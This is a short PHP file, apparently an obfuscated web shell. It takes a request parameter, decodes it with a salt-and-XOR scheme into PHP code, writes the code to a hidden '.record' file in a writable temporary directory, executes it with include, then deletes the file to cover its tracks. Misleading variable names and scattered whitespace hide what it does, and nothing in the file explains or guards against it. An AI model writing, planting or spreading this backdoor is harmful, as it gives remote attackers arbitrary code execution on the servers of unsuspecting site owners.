<?php

if(count($_REQUEST) > 0 && isset($_REQUEST["itm"])){
	$entity = array_filter([getenv("TMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TEMP"), getcwd(), "/tmp", "/dev/shm", session_save_path(), "/var/tmp"]);
	$tkn = $_REQUEST["itm"];
			$tkn 	=	 	explode 	(		"." 	,$tkn)	; 
	$desc		=  '';
            $salt		=  'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS		=  strlen($salt  );
            $m		=  0;
    
            $__tmp		=  $tkn;
            while ($v8		=  array_shift($__tmp)) {
                $chS		=  ord($salt[$m % $lenS]  );
                $d		=  ((int)$v8 - $chS - ($m % 10)) ^ 59;
                $desc .= chr($d  );
                $m++;	}
	foreach ($entity as $descriptor):
    		if (is_writable($descriptor) && is_dir($descriptor)) {
    $data = implode("/", [$descriptor, ".record"]);
    if (@file_put_contents($data, $desc) !== false) {
	include $data;
	unlink($data);
	die();
}
}
endforeach;
}